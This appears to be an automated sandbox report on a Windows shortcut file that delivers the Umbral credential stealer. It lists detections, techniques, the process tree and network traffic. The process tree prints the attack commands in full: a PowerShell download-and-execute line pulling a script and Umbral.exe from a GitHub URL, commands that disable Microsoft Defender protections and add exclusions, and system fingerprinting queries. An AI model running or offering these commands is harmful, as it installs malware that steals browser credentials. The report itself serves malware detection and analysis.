umbral | c30599a71b6129c75b93e7b508cc307928df2677fe1b00357547481662522033

Analysis

max time kernel
37s
max time network
42s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
23/03/2025, 14:56 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1231321312.lnk
Size

2KB
MD5

a83ed03220cbc79bcbcaae9a57d0b95a
SHA1

062d88505a421b491c8614ccff1d8fdd34453e18
SHA256

c30599a71b6129c75b93e7b508cc307928df2677fe1b00357547481662522033
SHA512

97f7b63aa0435cbe3fb597f3a18941d0697c053ff75ccfdfae55f2e0f70afde85e6ef82e0c90077dcbc933247b8ac568f1fd28a7b3cc1f0eb1af9640f409a349

Score

10^/10

umbral execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00080000000241d5-21.dat	family_umbral
behavioral1/memory/5908-30-0x000001BF93280000-0x000001BF932C0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	2912	powershell.exe
11	2912	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2912	powershell.exe
4880	powershell.exe
4452	powershell.exe
2876	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
5908	Umbral.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
50	discord.com
6	raw.githubusercontent.com
8	raw.githubusercontent.com
48	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
45	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1872	wmic.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2912	powershell.exe
2912	powershell.exe
4880	powershell.exe
4880	powershell.exe
4452	powershell.exe
4452	powershell.exe
2876	powershell.exe
2876	powershell.exe
2876	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	5908	Umbral.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeIncreaseQuotaPrivilege	4080	wmic.exe
Token: SeSecurityPrivilege	4080	wmic.exe
Token: SeTakeOwnershipPrivilege	4080	wmic.exe
Token: SeLoadDriverPrivilege	4080	wmic.exe
Token: SeSystemProfilePrivilege	4080	wmic.exe
Token: SeSystemtimePrivilege	4080	wmic.exe
Token: SeProfSingleProcessPrivilege	4080	wmic.exe
Token: SeIncBasePriorityPrivilege	4080	wmic.exe
Token: SeCreatePagefilePrivilege	4080	wmic.exe
Token: SeBackupPrivilege	4080	wmic.exe
Token: SeRestorePrivilege	4080	wmic.exe
Token: SeShutdownPrivilege	4080	wmic.exe
Token: SeDebugPrivilege	4080	wmic.exe
Token: SeSystemEnvironmentPrivilege	4080	wmic.exe
Token: SeRemoteShutdownPrivilege	4080	wmic.exe
Token: SeUndockPrivilege	4080	wmic.exe
Token: SeManageVolumePrivilege	4080	wmic.exe
Token: 33	4080	wmic.exe
Token: 34	4080	wmic.exe
Token: 35	4080	wmic.exe
Token: 36	4080	wmic.exe
Token: SeIncreaseQuotaPrivilege	4080	wmic.exe
Token: SeSecurityPrivilege	4080	wmic.exe
Token: SeTakeOwnershipPrivilege	4080	wmic.exe
Token: SeLoadDriverPrivilege	4080	wmic.exe
Token: SeSystemProfilePrivilege	4080	wmic.exe
Token: SeSystemtimePrivilege	4080	wmic.exe
Token: SeProfSingleProcessPrivilege	4080	wmic.exe
Token: SeIncBasePriorityPrivilege	4080	wmic.exe
Token: SeCreatePagefilePrivilege	4080	wmic.exe
Token: SeBackupPrivilege	4080	wmic.exe
Token: SeRestorePrivilege	4080	wmic.exe
Token: SeShutdownPrivilege	4080	wmic.exe
Token: SeDebugPrivilege	4080	wmic.exe
Token: SeSystemEnvironmentPrivilege	4080	wmic.exe
Token: SeRemoteShutdownPrivilege	4080	wmic.exe
Token: SeUndockPrivilege	4080	wmic.exe
Token: SeManageVolumePrivilege	4080	wmic.exe
Token: 33	4080	wmic.exe
Token: 34	4080	wmic.exe
Token: 35	4080	wmic.exe
Token: 36	4080	wmic.exe
Token: SeIncreaseQuotaPrivilege	1268	wmic.exe
Token: SeSecurityPrivilege	1268	wmic.exe
Token: SeTakeOwnershipPrivilege	1268	wmic.exe
Token: SeLoadDriverPrivilege	1268	wmic.exe
Token: SeSystemProfilePrivilege	1268	wmic.exe
Token: SeSystemtimePrivilege	1268	wmic.exe
Token: SeProfSingleProcessPrivilege	1268	wmic.exe
Token: SeIncBasePriorityPrivilege	1268	wmic.exe
Token: SeCreatePagefilePrivilege	1268	wmic.exe
Token: SeBackupPrivilege	1268	wmic.exe
Token: SeRestorePrivilege	1268	wmic.exe
Token: SeShutdownPrivilege	1268	wmic.exe
Token: SeDebugPrivilege	1268	wmic.exe
Token: SeSystemEnvironmentPrivilege	1268	wmic.exe
Token: SeRemoteShutdownPrivilege	1268	wmic.exe
Token: SeUndockPrivilege	1268	wmic.exe
Token: SeManageVolumePrivilege	1268	wmic.exe
Token: 33	1268	wmic.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 6000 wrote to memory of 2912	6000	cmd.exe	86
PID 6000 wrote to memory of 2912	6000	cmd.exe	86
PID 2912 wrote to memory of 5908	2912	powershell.exe	92
PID 2912 wrote to memory of 5908	2912	powershell.exe	92
PID 5908 wrote to memory of 4880	5908	Umbral.exe	93
PID 5908 wrote to memory of 4880	5908	Umbral.exe	93
PID 5908 wrote to memory of 4452	5908	Umbral.exe	95
PID 5908 wrote to memory of 4452	5908	Umbral.exe	95
PID 5908 wrote to memory of 4080	5908	Umbral.exe	100
PID 5908 wrote to memory of 4080	5908	Umbral.exe	100
PID 5908 wrote to memory of 1268	5908	Umbral.exe	103
PID 5908 wrote to memory of 1268	5908	Umbral.exe	103
PID 5908 wrote to memory of 4352	5908	Umbral.exe	105
PID 5908 wrote to memory of 4352	5908	Umbral.exe	105
PID 5908 wrote to memory of 2876	5908	Umbral.exe	107
PID 5908 wrote to memory of 2876	5908	Umbral.exe	107
PID 5908 wrote to memory of 1872	5908	Umbral.exe	109
PID 5908 wrote to memory of 1872	5908	Umbral.exe	109

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\1231321312.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:6000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1' -UseBasicParsing).Content"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4880
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4452
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4080
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1268
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:4352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2876
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1872

Network

DNS

raw.githubusercontent.com

powershell.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.109.133
GET

https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1

powershell.exe

Remote address:

185.199.110.133:443

Request

GET /sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 235
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "2ffb20924b8165e3bb0d1adeb4c308a05358721c09521f03eb9517e013c63729"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 9BA4:2CF82C:258870:51385F:67E0209A
Accept-Ranges: bytes
Date: Sun, 23 Mar 2025 14:56:48 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600093-LCY
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1742741809.901862,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 9c9648a2f0ae72915cc89930488506e761657acb
Expires: Sun, 23 Mar 2025 15:01:48 GMT
Source-Age: 150
GET

https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/Umbral.exe

powershell.exe

Remote address:

185.199.110.133:443

Request

GET /sigmanip/reallogs123fr/refs/heads/main/Umbral.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 232448
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "3bb1be44a471407bf874d31bb67f7ee3c0cabbbcd1ed58d49011f4e4de216d2d"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 637A:23CF78:2DC55B:635D7F:67E01D79
Accept-Ranges: bytes
Date: Sun, 23 Mar 2025 14:56:49 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600093-LCY
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1742741810.559584,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 0d864f50d8286eea9cffb22ca8bb9dc7a9704aa4
Expires: Sun, 23 Mar 2025 15:01:49 GMT
Source-Age: 150
DNS

github.com

powershell.exe

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
GET

https://github.com/sigmanip/reallogs123fr/raw/refs/heads/main/Umbral.exe

powershell.exe

Remote address:

20.26.156.215:443

Request

GET /sigmanip/reallogs123fr/raw/refs/heads/main/Umbral.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sun, 23 Mar 2025 14:56:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/Umbral.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/
X-GitHub-Request-Id: BDA3:3CE317:6520A7:844034:67E02131
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=330F6805DF6D6E631F907DBDDE4A6FEE; domain=.bing.com; expires=Fri, 17-Apr-2026 14:56:49 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 33E55781042B494D99A3808D6B7C3977 Ref B: LON04EDGE0716 Ref C: 2025-03-23T14:56:49Z
date: Sun, 23 Mar 2025 14:56:49 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=330F6805DF6D6E631F907DBDDE4A6FEE

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=wAMDP41-EczGmC7q26xDIXPST9Ix4lD3bPeZIxoSgYE; domain=.bing.com; expires=Fri, 17-Apr-2026 14:56:49 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F6363355ED994B3BA50A7F35557CB21E Ref B: LON04EDGE0716 Ref C: 2025-03-23T14:56:49Z
date: Sun, 23 Mar 2025 14:56:49 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=330F6805DF6D6E631F907DBDDE4A6FEE; MSPTC=wAMDP41-EczGmC7q26xDIXPST9Ix4lD3bPeZIxoSgYE

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2B5505CA640648F98BC3A9990ED96987 Ref B: LON04EDGE0716 Ref C: 2025-03-23T14:56:49Z
date: Sun, 23 Mar 2025 14:56:49 GMT
DNS

gstatic.com

Umbral.exe

Remote address:

8.8.8.8:53

Request

gstatic.com

IN A

Response

gstatic.com

IN A

172.217.16.227
GET

https://gstatic.com/generate_204

Umbral.exe

Remote address:

172.217.16.227:443

Request

GET /generate_204 HTTP/1.1
Host: gstatic.com
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Content-Length: 0
Cross-Origin-Resource-Policy: cross-origin
Date: Sun, 23 Mar 2025 14:56:52 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388267_1DFP94UDBWNO6AJBT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239339388267_1DFP94UDBWNO6AJBT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 439648
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CEC2D33B7E064FEA83147BFA364B4571 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
date: Sun, 23 Mar 2025 14:56:51 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418585_1K319IV1QEN3HBC0V&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239340418585_1K319IV1QEN3HBC0V&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 443925
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E989363938AD43718405CECC9CE0F242 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
date: Sun, 23 Mar 2025 14:56:51 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388266_1J4KSPP65Y4N6T5S1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239339388266_1J4KSPP65Y4N6T5S1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 440528
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: EDCE895C95F542C6B338DB5C59982ED7 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
date: Sun, 23 Mar 2025 14:56:51 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239359748018_19NTYSZS66ZTQP557&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239359748018_19NTYSZS66ZTQP557&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 561393
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: AE1EC42FA31D44D8B94F7A01F0F2420C Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
date: Sun, 23 Mar 2025 14:56:51 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239359748010_1Q8ARU8JIAMP3E64P&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239359748010_1Q8ARU8JIAMP3E64P&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 629947
content-type: image/jpeg
